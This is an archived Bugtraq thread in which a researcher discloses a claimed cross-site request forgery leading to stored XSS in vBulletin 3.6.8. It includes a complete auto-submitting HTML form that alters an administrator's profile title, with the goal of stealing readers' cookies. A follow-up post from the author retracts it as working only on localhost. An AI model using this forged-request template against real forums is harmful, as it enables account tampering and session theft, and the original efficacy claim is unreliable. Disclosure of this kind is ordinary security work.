Advanced
Mailing List Archive

Mailing List Archive

  1. Home >
  2. Bugtraq>
  3. Bugtraq
vBulletin 3.6.8 XSRF/XSS Vulnerability
nbbn at gmx
Jan 5, 2008, 1:46 PM
Post #1 of 2 (2239 views)
Permalink
###############################################################
Autor: NBBN
Founded: 5, January 2008
vBulletin Version: 3.6.8 Patch Level x and possible lower
Type: XSRF/XSS
Risk: Medium
###############################################################

##Explanation(english)##

My english is bad, but I try :-) . vBulletin 3.6.8 is XSRF vulnurable.
Administrators can use html in there own usertitle.
An attacker can update the profile of an administrator by sending a link to a
site with a code like this:


<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile"
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>

If an attacker send a link in a pm for example, to the admin with a site
like the example code, the admin's usertitle updating and have a the code of
the attacker.The code executing if the admin have a post done in a thread
etc. An attacker can use this to steal the cookie of all user's who are
reading the thread.


##Explanation(Deutsch/German)##:

In vBulletin 3.6.8 gibt es eine XSRF Lücke, die dazu benutzt werden kann, um
XSS Code auszuführen. Admins können in ihren eigenen Benutzerrang HTML Code
verwenden. Das kann ein Angreifer ausnutzen um beliebigen html/javascript
code auszuführen, wenn er den oben stehenden code in eine Seite packt und
dann dem Admin eine Private Nachricht sendet, mit einem Link zu einer Seite
mit dem obigen HTML-Code. Somit ist es dem Angreifer möglich, alle Cookies
von den Benutzern zu klauen, die gerade einen Thread lesen,in welchem ein
Administrator gepostet hat.
Re: vBulletin 3.6.8 XSRF/XSS Vulnerability [ In reply to ]
nbbn at gmx
Jan 7, 2008, 8:51 AM
Post #2 of 2 (2166 views)
Permalink
Am Samstag 05 Januar 2008 22:46:14 schrieb nbbn@gmx.net:
> ###############################################################
> Autor: NBBN
> Founded: 5, January 2008
> vBulletin Version: 3.6.8 Patch Level x and possible lower
> Type: XSRF/XSS
> Risk: Medium
> ###############################################################
>
> ##Explanation(english)##
>
> My english is bad, but I try :-) . vBulletin 3.6.8 is XSRF vulnurable.
> Administrators can use html in there own usertitle.
> An attacker can update the profile of an administrator by sending a link
> to a site with a code like this:
>
>
> <html>
> <head></head>
> <body onLoad=javascript:document.form.submit()>
>
> <form
> action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile"
> method="POST" name="form">
>
> <input type="hidden" name="s" value="">
> <input type="hidden" name="do" value="updateprofile">
> <input type="hidden" name="customtext" value="###########XSS
> CODE#########"> <!-- Attacker's XSS Code -->
> <input type="hidden" name="month" value="-1">
> <input type="hidden" name="day" value="-1">
> <input type="hidden" name="year" value="">
> <input type="hidden" name="oldbirthday" value="">
> <input type="hidden" name="showbirthday" value="2">
> <input type="hidden" name="homepage" value="">
> <input type="hidden" name="icq" value="">
> <input type="hidden" name="aim" value="">
> <input type="hidden" name="msn" value="">
> <input type="hidden" name="yahoo" value="">
> <input type="hidden" name="skype" value="">
> </form>
> </body>
> </html>
>
> If an attacker send a link in a pm for example, to the admin with a site
> like the example code, the admin's usertitle updating and have a the code
> of the attacker.The code executing if the admin have a post done in a
> thread etc. An attacker can use this to steal the cookie of all user's who
> are reading the thread.
>
>
> ##Explanation(Deutsch/German)##:
>
> In vBulletin 3.6.8 gibt es eine XSRF Lücke, die dazu benutzt werden kann,
> um XSS Code auszuführen. Admins können in ihren eigenen Benutzerrang HTML
> Code verwenden. Das kann ein Angreifer ausnutzen um beliebigen
> html/javascript code auszuführen, wenn er den oben stehenden code in eine
> Seite packt und dann dem Admin eine Private Nachricht sendet, mit einem
> Link zu einer Seite mit dem obigen HTML-Code. Somit ist es dem Angreifer
> möglich, alle Cookies von den Benutzern zu klauen, die gerade einen Thread
> lesen,in welchem ein Administrator gepostet hat.


Sorry this not work, tested only at localhost, but from remote host's it
doesn't work.

©2024 GT.net. A Gossamer Threads company.
5th Floor, 455 Granville St., Vancouver, BC V6C 1T1, Canada | Legal